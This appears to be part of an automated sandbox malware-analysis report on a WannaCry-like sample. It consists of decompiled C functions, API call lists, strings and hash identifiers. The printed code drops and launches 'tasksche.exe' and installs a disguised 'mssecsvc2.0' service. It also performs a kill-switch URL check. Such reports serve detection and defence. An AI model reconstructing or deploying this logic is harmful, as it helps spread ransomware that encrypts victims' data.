												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e43
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebc
0x00407ed3
0x00407edb
0x00407ee0
0x00407ee8
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F76FB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C
CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
CreateProcessA.KERNELBASE ref: 00407EE8
CloseHandle.KERNEL32(00000000), ref: 00407EF7
CloseHandle.KERNEL32(08000000), ref: 00407F02

Strings

CreateProcessA, xrefs: 00407D07
D, xrefs: 00407ED3
CreateFileA, xrefs: 00407D0F
/i, xrefs: 00407E8D
kernel32.dll, xrefs: 00407CEA
WriteFile, xrefs: 00407D1C
tasksche.exe, xrefs: 00407DEA
WINDOWS, xrefs: 00407DF2, 00407E0D
C:\%s\qeriuwjhrf, xrefs: 00407E12
CloseHandle, xrefs: 00407D29
C:\%s\%s, xrefs: 00407DFB

Memory Dump Source

Source File: 00000000.00000002.319143152.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.319088350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319157206.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319209764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 1541710770-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t4;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t4 = OpenSCManagerA(0, 0, 0xf003f); // executed
				_t15 = _t4;
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c68
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.SECHOST(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F76FB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

mssecsvc2.0, xrefs: 00407C95
Microsoft Security Center (2.0) Service, xrefs: 00407C90
%s -m security, xrefs: 00407C50

Memory Dump Source

Source File: 00000000.00000002.319143152.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.319088350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319157206.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319209764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-4063779371
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

0x00409a19
0x00409a1b
0x00409a20
0x00409a2b
0x00409a2c
0x00409a39
0x00409a3e
0x00409a43
0x00409a4a
0x00409a51
0x00409a64
0x00409a72
0x00409a7b
0x00409a80
0x00409a85
0x00409a8b
0x00409a92
0x00409a98
0x00409a99
0x00409a9e
0x00409aa3
0x00409aa8
0x00409ab2
0x00409acb
0x00409ad1
0x00409ad6
0x00409adb
0x00409ae8
0x00409aea
0x00409af0
0x00409b2c
0x00409b31
0x00409b32
0x00409b32
0x00409af2
0x00409af2
0x00409af2
0x00409af3
0x00409af6
0x00409af8
0x00409b03
0x00409b05
0x00409b05
0x00409b06
0x00409b06
0x00409b03
0x00409b09
0x00409b0d
0x00000000
0x00000000
0x00409b13
0x00409b1a
0x00409b24
0x00409b39
0x00409b26
0x00409b26
0x00409b26
0x00409b3a
0x00409b3b
0x00409b3c
0x00409b44
0x00409b45
0x00409b4a
0x00409b4e
0x00409b54
0x00409b59
0x00409b5b
0x00409b5e
0x00409b5f
0x00409b60
0x00409b67

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.KERNELBASE ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000000.00000002.319143152.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.319088350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319157206.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319209764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 6.0, APIs: 4, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t14;
				void* _t27;

				_t12 = memcpy( &_v80, 0x4313d0, 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				_t14 = InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0);
				_push(_t27);
				if (_t14 != 0) goto L1;
				InternetCloseHandle();
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x0040819c
0x004081a5
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Memory Dump Source

Source File: 00000000.00000002.319143152.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.319088350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319157206.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319209764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: 7bc602e844cdf910e4a24fc0389d75e4e4c0db4e5e0cdfe1b8e612c3f784a296
Instruction ID: 1dd4d323c29996ceece3d10fb5d3e331cb9ed4e1cabd62d72b2cd6c3d10c6962
Opcode Fuzzy Hash: 7bc602e844cdf910e4a24fc0389d75e4e4c0db4e5e0cdfe1b8e612c3f784a296
Instruction Fuzzy Hash: 050162715443106EE320DF648D01B6B7BE9EF85710F01082EF984E7280EAB59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}

0x0040809f
0x004080a5
0x004080ab
0x004080ae
0x004080c9
0x004080cb
0x004080cd
0x004080e8
0x004080ea
0x004080ec
0x004080f1
0x004080fa
0x004080fa
0x004080fd
0x00408100
0x00408105
0x0040810e
0x00408116
0x0040811e
0x00408130
0x004080b0
0x004080b8
0x004080b8

APIs

GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F76FB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000000.00000002.319143152.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.319088350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319157206.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319209764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: mssecsvc2.0
API String ID: 4274534310-3729025388
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: onq54JS79W.exePID: 6948, Parent PID: 576COMMON

Executed Functions

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t7;
				int _t9;
				void* _t10;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t7 = OpenSCManagerA(0, 0, 0xf003f); // executed
					_t19 = _t7;
					__eflags = _t19;
					if(_t19 != 0) {
						_t10 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff); // executed
						_t22 = _t10;
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
					return _t9;
				} else {
					return E00407F20(_t26);
				}
			}

0x0040809f
0x004080a5
0x004080ab
0x004080ae
0x004080c3
0x004080c9
0x004080cb
0x004080cd
0x004080dc
0x004080e8
0x004080ea
0x004080ec
0x004080f1
0x004080fa
0x004080fa
0x004080fd
0x00408100
0x00408105
0x0040810e
0x00408116
0x0040811e
0x00408126
0x00408130
0x004080b0
0x004080b8
0x004080b8

APIs

GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F76FB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000001.00000002.579707535.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.579702659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579719630.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579778869.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579787871.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: mssecsvc2.0
API String ID: 4274534310-3729025388
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.MSVCRT ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000001.00000002.579707535.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.579702659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579719630.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579778869.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579787871.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 6.0, APIs: 4, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t14;
				void* _t27;

				_t12 = memcpy( &_v80, 0x4313d0, 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				_t14 = InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0);
				_push(_t27);
				if (_t14 != 0) goto L1;
				InternetCloseHandle();
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x0040819c
0x004081a5
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
